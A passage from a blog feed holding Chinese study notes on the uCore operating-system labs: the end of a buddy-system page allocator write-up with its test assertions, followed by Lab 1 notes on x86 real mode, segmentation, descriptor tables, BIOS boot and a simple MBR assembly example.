base-&gt;property)</span><br><span class="line">                 || (p-&gt;property ==  base-&gt;property &amp;&amp; p &gt; base))</span><br><span class="line">                targetLe = <span class="built_in">list_next</span>(targetLe);</span><br><span class="line">            <span class="comment">// 如果当前内存块的位置不正确，则重置位置</span></span><br><span class="line">            <span class="keyword">if</span>(targetLe != <span class="built_in">list_next</span>(&amp;base-&gt;page_link))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">list_del</span>(&amp;(base-&gt;page_link));</span><br><span class="line">                <span class="built_in">list_add_before</span>(targetLe, &amp;(base-&gt;page_link));</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 最后退出</span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        le = <span class="built_in">list_next</span>(le);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h5 id="5-算法检查">5. 算法检查</h5><p><code>buddy_check</code>是一个不能忽视的检查函数，该函数可以帮助查找出程序内部隐藏的bug。笔者将其中原本用于检查<code>FIFO</code>算法的内容修改成检查<code>buddySystem</code>的内容。所修改的内容如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.........................................................</span></span><br><span class="line"><span class="comment">// 先释放</span></span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">26</span>);     <span class="comment">// 32+  (-:已分配 +: 已释放)</span></span><br><span class="line"><span class="comment">// 首先检查是否对齐2</span></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">6</span>);    <span class="comment">// 8- 8+ 16+</span></span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">10</span>);   <span class="comment">// 8- 8+ 16-</span></span><br><span class="line"><span class="built_in">assert</span>((p0 + <span class="number">8</span>)-&gt;property == <span class="number">8</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">10</span>);     <span class="comment">// 8- 8+ 16+</span></span><br><span class="line"><span class="built_in">assert</span>((p0 + <span class="number">8</span>)-&gt;property == <span class="number">8</span>);</span><br><span class="line"><span class="built_in">assert</span>(p1-&gt;property == <span class="number">16</span>);</span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">16</span>);   <span class="comment">// 8- 8+ 16-</span></span><br><span class="line"><span class="comment">// 之后检查合并</span></span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">6</span>);      <span class="comment">// 16+ 16-</span></span><br><span class="line"><span class="built_in">assert</span>(p0-&gt;property == <span class="number">16</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">16</span>);     <span class="comment">// 32+</span></span><br><span class="line"><span class="built_in">assert</span>(p0-&gt;property == <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">8</span>);    <span class="comment">// 8- 8+ 16+</span></span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">9</span>);    <span class="comment">// 8- 8+ 16-</span></span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">9</span>);     <span class="comment">// 8- 8+ 16+</span></span><br><span class="line"><span class="built_in">assert</span>(p1-&gt;property == <span class="number">16</span>);</span><br><span class="line"><span class="built_in">assert</span>((p0 + <span class="number">8</span>)-&gt;property == <span class="number">8</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">8</span>);      <span class="comment">// 32+</span></span><br><span class="line"><span class="built_in">assert</span>(p0-&gt;property == <span class="number">32</span>);</span><br><span class="line"><span class="comment">// 检测链表顺序是否按照块的大小排序的</span></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">5</span>);</span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">16</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">16</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;((p1 - <span class="number">8</span>)-&gt;page_link));</span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">5</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;(p0-&gt;page_link));</span><br><span class="line"></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">5</span>);</span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">16</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">5</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;(p0-&gt;page_link));</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">16</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;(p0-&gt;page_link));</span><br><span class="line"></span><br><span class="line"><span class="comment">// 还原</span></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">26</span>);</span><br><span class="line"><span class="comment">//.........................................................</span></span><br></pre></td></tr></table></figure><h5 id="6-总结与完整代码">6. 总结与完整代码</h5><ul><li><p><code>buddySystem</code>在<strong>所分配的内存大小均为2的n次幂</strong>这种环境下，使用效果极佳。</p></li><li><p>由于<code>buddySystem</code>的特性，最好使用二叉树而非普通双向链表来管理内存块，这样就可以避免一系列的bug。</p><p>即便普通双向链表可以很好的实现<code>buddySystem</code>，但其中仍然存在一个较为麻烦的问题：</p><blockquote><p><strong>当某个物理块释放，将其插入至双向链表后，如果该物理块既可以和上一个物理块合并，又可以和下一个物理块合并，那么此时该合并哪一个物理块？</strong></p></blockquote><p>这个问题，双向链表无法很好的解决，该问题很可能会使一些物理块因为错误的合并顺序而最终导致内存的碎片化，降低内存的使用率。</p></li><li><p>完整代码位于<a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/uCore/os_kernel_lab-master_RAW/labcodes/lab2/kern/mm/buddySystem_pmm.c">github</a>，如有需要请自取。</p></li></ul><h4 id="Challenge2">Challenge2</h4><blockquote><p><strong>任意大小的内存单元slub分配算法</strong></p><p>slub算法，实现两层架构的高效内存单元分配，第一层是基于页大小的内存分配，第二层是在第一层基础上实现基于任意大小的内存分配。可简化实现，能够体现其主体思想即可。</p></blockquote><blockquote><p>Challenge2 先鸽了，赶进度QWQ</p></blockquote>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 2时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及段页式存储管理、页机制以及uCore页目录与页表结构等&lt;/li&gt;
&lt;li&gt;内容较多，建议使用右侧导航栏。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab1</title>
    <link href="https://kiprey.github.io/2020/08/uCore-1/"/>
    <id>https://kiprey.github.io/2020/08/uCore-1/</id>
    <published>2020-08-04T12:16:04.000Z</published>
    <updated>2025-11-24T03:59:40.142Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成uCore实验1时写下的一点笔记</li><li>内容涉及CPU实模式、中断处理以及特权级更改等</li><li>内容较多，建议使用右侧导航栏。</li></ul><span id="more"></span><h2 id="知识点">知识点</h2><h3 id="1-环境配置">1. 环境配置</h3><ul><li>执行<code>sudo apt-get install qemu-system</code>，安装qemu程序，为执行uCore做准备</li><li>下载该<a href="https://github.com/chyyuu/os_kernel_lab">github</a>上的<strong>master</strong>分支（注意默认分支不是master分支）的uCore代码，解压使用。</li></ul><h3 id="2-BIOS中断、DOS中断、Linux中断的区别">2. BIOS中断、DOS中断、Linux中断的区别</h3><ul><li>BIOS和DOS都存在于实模式下，由它们建立的中断调用都是建立在中断向量表（Interrupt Vector Table，IVT）中的，都是通过软中断指令 int 中断号来调用。</li><li>BIOS 中断调用的主要功能是提供了硬件访问的方法，该方法使对硬件的操作变得简单易行。</li><li>DOS 是运行在实模式下的，故其建立的中断调用也建立在中断向量表中，只不过其中断向量号和BIOS的不能冲突。</li><li>Linux 内核是在进入保护模式后才建立中断例程的，不过在保护模式下，中断向量表已经不存在了，取而代之的是中断描述符表（Interrupt Descriptor Table，IDT）。Linux 的系统调用和DOS中断调用类似，不过Linux是通过<code>int 0x80</code>指令进入一个中断程序后再根据eax寄存器的值来调用不同的子功能函数的。</li></ul><h3 id="3-操作系统如何识别文件系统">3. 操作系统如何识别文件系统</h3><ul><li>各分区都有超级块，一般位于本分区的第2个扇区。超级块里面记录了此分区的信息，其中就有文件系统的魔数，一种文件系统对应一个魔数，通过比较即可得知文件系统类型。</li></ul><h3 id="4-CPU的实模式（重要）">4. CPU的实模式（重要）</h3><ul><li><p>CPU大体上可分为控制单元、运算单元、存储单元</p><ul><li>控制单元是CPU的控制中心，大致由指令寄存器(IR, Instruction Register)、指令译码器(ID, Instruction Decoder)和操作控制器(OC, Operation Controller)组成。以下是一般的指令格式<br><img src="/2020/08/uCore-1/ia32Inst.png" alt="img"></li><li>运算单元根据控制单元的信号，进行运算。</li><li>存储单元CPU内部的L1、L2缓存及寄存器。这部分缓存采用SRAM存储器。SRAM不需要刷新电路即可保存内部存储的数据，但因为体积较大，集成度较低。</li></ul></li><li><p>CPU中的寄存器分为两大类：程序可见寄存器（例如通用寄存器、段寄存器）和程序不可见寄存器（例如中断描述符寄存器IDTR）。<br><img src="/2020/08/uCore-1/commonRegister.png" alt="img"></p></li><li><p>实模式的主要特性是：<strong>程序用到的地址都是真实的物理地址</strong>。同时，实模式下的地址寻址空间只有1MB(20bit)</p><blockquote><p>从intel 80386开始的CPU，只要进入实模式，地址寻址空间就限制在1MB。</p></blockquote></li><li><p>实模式下的地址计算方式为<strong>16*段寄存器值+段内偏移地址</strong>，其CPU寻址方式为</p><ul><li>寄存器寻址</li><li>立即数寻址</li><li>内存寻址<ul><li>直接寻址。例如<code>mov ax, [0x1234]</code></li><li>基址寻址</li><li>变址寻址</li><li>基址变址寻址</li></ul></li></ul></li></ul><h4 id="a-CPU实模式下的1MB内存">a. CPU实模式下的1MB内存</h4><ul><li><p>CPU初始状态为16位实模式，在实模式下只能访问1MB(20bits)内存。而硬件工程师将1MB的内存空间分成多个部分。<br><img src="/2020/08/uCore-1/memmap.png" alt="img"></p></li><li><p>其中地址<code>0-0x9ffff</code>的640KB内存是DRAM，即插在主板上的内存条。<br>顶部<code>0xf0000-0xfffff</code>的64KB内存是ROM，存放BIOS代码。</p><blockquote><p>BIOS检测并初始化硬件，同时建立中断向量表，并保证能运行一些基本硬件的IO操作</p></blockquote></li><li><p>CPU中，插在主板上的物理内存并不是眼中“全部的内存”。地址总线宽度决定可以访问的内存空间大小。<br>并不是只有插在主板上的内存条需要通过地址总线访问，还有一些外设同样是需要通过地址总线来访问。<br>故地址总线上会提前预留出来一些地址空间给这些外设，其余的可用地址再指向DRAM。</p></li></ul><h3 id="5-CPU的分段机制（重要）">5. CPU的分段机制（重要）</h3><h4 id="a-内存访问为什么要分段">a. 内存访问为什么要分段</h4><ul><li>以前程序都是直接访问物理内存，所以编译出的两个程序如果内存冲突，则无法同时运行。</li><li>CPU采用“段基址+段内偏移地址”的方式来访问任意内存。好处是程序可以重定位，可以执行多个程序。</li><li>段基址不需要得是65536的倍数。</li><li>加载用户程序时，只要将整个段的内容复制到新的位置，再将段基址寄存器中的地址改成该地址，程序便可准确无误地运行，因为程序中用的是段内偏移地址。</li><li>改变段基址，通过在内存中一个段来回挪位置的方式可以访问到任意内存位置。程序分段可以将大内存分成可以访问的小段，访问到所有内存。</li><li>通过分段，在早期CPU实模式16位寄存器的情况下，计算<strong>段基址 &lt;&lt; 4 + 段内偏移地址</strong>，即可访问到20位地址空间。</li></ul><blockquote><p>代码中的分段与CPU的分段不同。编译器负责挑选出数据具备的属性，从而根据属性将程序片段分类，比如划分出了只读属性的代码段和可写属性的数据段。编译器并没有让段具备某种属性，对于代码段，编译器只是将代码归类到一起，并没有为代码段添加额外的信息。</p></blockquote><ul><li><strong>在实模式下，段基址直接写在段寄存器中；而在保护模式下，段寄存器中的不再是段基址，而是段选择子。</strong></li><li>分段机涉及4个关键内容：逻辑地址、段描述符（描述段的属性）、段描述符表（包含多个段描述符的“数组”）、段选择子（段寄存器，用于定位段描述符表中表项的索引）。只有在<strong>保护模式</strong>下才能使用分段存储管理机制。</li></ul><h4 id="b-将逻辑地址转换为物理地址的两步操作">b. 将逻辑地址转换为物理地址的两步操作</h4><blockquote><p>逻辑地址是程序员能看到的虚拟地址。</p></blockquote><ul><li>分段地址转换：CPU把逻辑地址（由段选择子selector和段偏移offset组成）中的段选择子的内容作为段描述符表的索引，找到表中对应的段描述符，然后把段描述符中保存的段基址加上段偏移值，形成线性地址（Linear Address）。</li><li>分页地址转换，这一步中把线性地址转换为物理地址。<br><img src="/2020/08/uCore-1/segmentTranslation.png" alt="img"></li></ul><h4 id="c-段描述符">c. 段描述符</h4><ul><li><p>在分段存储管理机制的保护模式下，每个段由如下三个参数进行定义：段基地址(Base Address)、段界限(Limit)和段属性(Attributes)</p><ul><li>段基地址：规定线性地址空间中段的起始地址。任何一个段都可以从32位线性地址空间中的任何一个字节开始，不用像实模式下规定边界必须被16整除。</li><li>段界限：规定段的大小。可以以字节为单位或以4K字节为单位。</li><li>段属性：确定段的各种性质。<ul><li>段属性中的粒度位（Granularity），用符号G标记。G=0表示段界限以字节位位单位，20位的界限可表示的范围是1字节至1M字节，增量为1字节；G=1表示段界限以4K字节为单位，于是20位的界限可表示的范围是4K字节至4G字节，增量为4K字节。</li><li>类型（TYPE）：用于区别不同类型的描述符。可表示所描述的段是代码段还是数据段，所描述的段是否可读/写/执行，段的扩展方向等。其4bit从左到右分别是<ul><li>执行位：置1时表示可执行，置0时表示不可执行；</li><li>一致位：置1时表示一致码段，置0时表示非一致码段；</li><li>读写位：置1时表示可读可写，置0时表示只读；</li><li>访问位：置1时表示已访问，置0时表示未访问。</li></ul></li><li>描述符特权级（Descriptor Privilege Level）（DPL）：用来实现保护机制。</li><li>段存在位（Segment-Present bit）：如果这一位为0，则此描述符为非法的，不能被用来实现地址转换。如果一个非法描述符被加载进一个段寄存器，处理器会立即产生异常。操作系统可以任意的使用被标识为可用（AVAILABLE）的位。</li><li>已访问位（Accessed bit）：当处理器访问该段（当一个指向该段描述符的选择子被加载进一个段寄存器）时，将自动设置访问位。操作系统可清除该位。</li></ul></li></ul></li><li><p>段描述符的格式<br><img src="/2020/08/uCore-1/SegmentDescription.png" alt="img"></p></li><li><p>段描述符的结构</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* segment descriptors */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">segdesc</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> sd_lim_15_0 : <span class="number">16</span>;        <span class="comment">// low bits of segment limit</span></span><br><span class="line">    <span class="type">unsigned</span> sd_base_15_0 : <span class="number">16</span>;        <span class="comment">// low bits of segment base address</span></span><br><span class="line">    <span class="type">unsigned</span> sd_base_23_16 : <span class="number">8</span>;        <span class="comment">// middle bits of segment base address</span></span><br><span class="line">    <span class="type">unsigned</span> sd_type : <span class="number">4</span>;            <span class="comment">// segment type (see STS_ constants)</span></span><br><span class="line">    <span class="type">unsigned</span> sd_s : <span class="number">1</span>;                <span class="comment">// 0 = system, 1 = application</span></span><br><span class="line">    <span class="type">unsigned</span> sd_dpl : <span class="number">2</span>;            <span class="comment">// descriptor Privilege Level</span></span><br><span class="line">    <span class="type">unsigned</span> sd_p : <span class="number">1</span>;                <span class="comment">// present</span></span><br><span class="line">    <span class="type">unsigned</span> sd_lim_19_16 : <span class="number">4</span>;        <span class="comment">// high bits of segment limit</span></span><br><span class="line">    <span class="type">unsigned</span> sd_avl : <span class="number">1</span>;            <span class="comment">// unused (available for software use)</span></span><br><span class="line">    <span class="type">unsigned</span> sd_rsv1 : <span class="number">1</span>;            <span class="comment">// reserved</span></span><br><span class="line">    <span class="type">unsigned</span> sd_db : <span class="number">1</span>;                <span class="comment">// 0 = 16-bit segment, 1 = 32-bit segment</span></span><br><span class="line">    <span class="type">unsigned</span> sd_g : <span class="number">1</span>;                <span class="comment">// granularity: limit scaled by 4K when set</span></span><br><span class="line">    <span class="type">unsigned</span> sd_base_31_24 : <span class="number">8</span>;        <span class="comment">// high bits of segment base address</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-全局描述符表">d. 全局描述符表</h4><ul><li>全局描述符表（GDT）是一个保存多个段描述符的“数组”，其起始地址保存在全局描述符表寄存器GDTR中。GDTR长48位，其中高32位为基地址，低16位为段界限。</li><li>全局描述符表的一个demo</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> SEG(type, base, lim, dpl)                        \</span></span><br><span class="line"><span class="meta">    (struct segdesc)&#123;                                    \</span></span><br><span class="line"><span class="meta">        ((lim) &gt;&gt; 12) &amp; 0xffff, (base) &amp; 0xffff,        \</span></span><br><span class="line"><span class="meta">        ((base) &gt;&gt; 16) &amp; 0xff, type, 1, dpl, 1,            \</span></span><br><span class="line"><span class="meta">        (unsigned)(lim) &gt;&gt; 28, 0, 0, 1, 1,                \</span></span><br><span class="line"><span class="meta">        (unsigned) (base) &gt;&gt; 24                            \</span></span><br><span class="line"><span class="meta">    &#125;</span></span><br><span class="line"><span class="comment">/* *</span></span><br><span class="line"><span class="comment"> * Global Descriptor Table:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The kernel and user segments are identical (except for the DPL). To load</span></span><br><span class="line"><span class="comment"> * the %ss register, the CPL must equal the DPL. Thus, we must duplicate the</span></span><br><span class="line"><span class="comment"> * segments for the user and the kernel. Defined as follows:</span></span><br><span class="line"><span class="comment"> *   - 0x0 :  unused (always faults -- for trapping NULL far pointers)</span></span><br><span class="line"><span class="comment"> *   - 0x8 :  kernel code segment</span></span><br><span class="line"><span class="comment"> *   - 0x10:  kernel data segment</span></span><br><span class="line"><span class="comment"> *   - 0x18:  user code segment</span></span><br><span class="line"><span class="comment"> *   - 0x20:  user data segment</span></span><br><span class="line"><span class="comment"> *   - 0x28:  defined for tss, initialized in gdt_init</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">segdesc</span> gdt[] = &#123;</span><br><span class="line">    SEG_NULL,</span><br><span class="line">    [SEG_KTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_KDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_UTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_UDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_TSS]    = SEG_NULL,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h4 id="e-选择子">e. 选择子</h4><ul><li>线性地址部分的选择子是用来选择哪个描述符表和在该表中索引哪个描述符的。选择子可以做为指针变量的一部分，从而对应用程序员是可见的，但是一般是由连接加载器来设置的。</li><li>段选择子结构<ul><li>索引（Index）：在描述符表中从8192个描述符中选择一个描述符。处理器自动将这个索引值乘以8（描述符的长度），再加上描述符表的基址来索引描述符表，从而选出一个合适的描述符。</li><li>表指示位（Table Indicator，TI）：选择应该访问哪一个描述符表。0代表应该访问全局描述符表（GDT），1代表应该访问局部描述符表（LDT）。</li><li>请求特权级（Requested Privilege Level，RPL）：保护机制。<br><img src="/2020/08/uCore-1/FormatOfSelector.png" alt="img"></li></ul></li><li>全局描述符表的第一个描述符无法被CPU使用，所以当一个段选择子的索引（Index）部分和表指示位（Table Indicator）都为0的时（即段选择子指向全局描述符表的第一项时），可以当做一个空的选择子。当一个段寄存器被加载一个空选择子时，处理器并不会产生一个异常。但是，当用一个空选择子去访问内存时，则会产生异常。</li></ul><h3 id="6-BIOS是如何苏醒的（重要）">6. BIOS是如何苏醒的（重要）</h3><ul><li>BIOS代码被写进ROM中，该ROM被映射到低端1M内存的顶部，即地址<code>0xF0000~0xFFFFF</code>。BIOS的入口地址为<code>0xFFFF0</code>。<br>开机接电的一瞬间，CPU的CS:IP寄存器被强制初始化为<code>0xF000:0xFFF0</code>，即<code>0xFFFF0</code>。<br>由于实模式下最高寻址1MB，故<code>0xFFFF0</code>处是一条跳转指令<code>jmp far f000:e05b</code>，跳转至BIOS真正的代码。之后便开始检测并初始化外设、与<code>0x000-0x3ff</code>建立数据结构，中断向量表IVT并填写中断例程。</li><li>BIOS最后校验启动盘中位于0盘0道1扇区(MBR)的内容。如果此扇区末尾两个字节分别是魔数<code>0x55</code>和<code>0xaa</code>，则BIOS认为此扇区中存在可执行的程序，并加载该512字节数据到<code>0x7c00</code>，随后跳转至此继续执行。使用的跳转指令为<code>jmp 0:0x7c00</code>，该指令是jmp指令的直接绝对远转移用法。<blockquote><p>磁盘与磁道的编号从0开始，扇区编号从1开始。<br>选择<code>0x7c00</code>是避免覆盖已有的数据以及被其他数据覆盖。</p></blockquote></li></ul><h3 id="7-MBR-Bootloader">7. MBR/Bootloader</h3><ul><li><p>bootloader的作用</p><ul><li>切换保护模式 &amp; 段机制</li><li>从硬盘上读取kernel in ELF格式的ucore kernel（跟在MBR后面的扇区），并放到内存中固定。</li><li>跳转到ucoreOS的入口点执行，将控制权移交给ucore OS。</li></ul></li><li><p>MBR是主引导记录（Master Boot Record），也被称为主引导扇区，是计算机开机以后访问硬盘时所必须要读取的第一个扇区。其内部前446字节存储了bootloader代码，其后是4个16字节的“磁盘分区表”。</p><blockquote><p>MBR是整个硬盘最重要的区域，一旦MBR物理实体损坏时，则该硬盘基本报废。</p></blockquote></li><li><p>bootloader的入口点为<code>0x7c00</code>。以下是一个简单的类MBR程序，该程序只会将<code>1 MBR</code>字符串打印到屏幕上并挂起。通过该程序我们可以对MBR结构有了更深的了解。</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">;主引导程序</span></span><br><span class="line"><span class="comment">;------------------------------------------------------------</span></span><br><span class="line"><span class="meta">SECTION</span> MBR vstart=<span class="number">0x7c00</span> <span class="comment">; 起始地址编译为0x7c00</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>,<span class="built_in">cs</span>   <span class="comment">; 此时的cs为0，用0来初始化所有的段寄存器</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ds</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">es</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ss</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">fs</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">sp</span>,<span class="number">0x7c00</span> <span class="comment">; 0x7c00 以下空间暂时安全，故可用做栈。</span></span><br><span class="line"></span><br><span class="line"><span class="comment">; 清屏 利用0x06号功能，上卷全部行，则可清屏。</span></span><br><span class="line"><span class="comment">; -----------------------------------------------------------</span></span><br><span class="line"><span class="comment">;INT 0x10   功能号:0x06   功能描述:上卷窗口</span></span><br><span class="line"><span class="comment">;------------------------------------------------------</span></span><br><span class="line"><span class="comment">;输入：</span></span><br><span class="line"><span class="comment">;AH 功能号= 0x06</span></span><br><span class="line"><span class="comment">;AL = 上卷的行数(如果为0,表示全部)</span></span><br><span class="line"><span class="comment">;BH = 上卷行属性</span></span><br><span class="line"><span class="comment">;(CL,CH) = 窗口左上角的(X,Y)位置</span></span><br><span class="line"><span class="comment">;(DL,DH) = 窗口右下角的(X,Y)位置</span></span><br><span class="line"><span class="comment">;无返回值：</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">ax</span>, <span class="number">0x600</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">bx</span>, <span class="number">0x700</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">cx</span>, <span class="number">0</span>          <span class="comment">; 左上角: (0, 0)</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">dx</span>, <span class="number">0x184f</span>     <span class="comment">; 右下角: (80,25),</span></span><br><span class="line">        <span class="comment">; VGA文本模式中,一行只能容纳80个字符,共25行。</span></span><br><span class="line">        <span class="comment">; 下标从0开始,所以0x18=24,0x4f=79</span></span><br><span class="line">  <span class="keyword">int</span>     <span class="number">0x10</span>            <span class="comment">; int 0x10</span></span><br><span class="line"></span><br><span class="line"><span class="comment">;;;;;;;;;    下面这三行代码是获取光标位置    ;;;;;;;;;</span></span><br><span class="line"><span class="comment">;.get_cursor获取当前光标位置,在光标位置处打印字符.</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="number">ah</span>, <span class="number">3</span>   <span class="comment">; 输入: 3 号子功能是获取光标位置,需要存入ah寄存器</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="number">bh</span>, <span class="number">0</span>   <span class="comment">; bh寄存器存储的是待获取光标的页号</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">int</span> <span class="number">0x10</span>    <span class="comment">; 输出: ch=光标开始行,cl=光标结束行</span></span><br><span class="line">      <span class="comment">; dh=光标所在行号,dl=光标所在列号</span></span><br><span class="line"></span><br><span class="line"><span class="comment">;;;;;;;;;    获取光标位置结束    ;;;;;;;;;;;;;;;;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">;;;;;;;;;     打印字符串    ;;;;;;;;;;;</span></span><br><span class="line">  <span class="comment">;还是用10h中断,不过这次是调用13号子功能打印字符串</span></span><br><span class="line">  <span 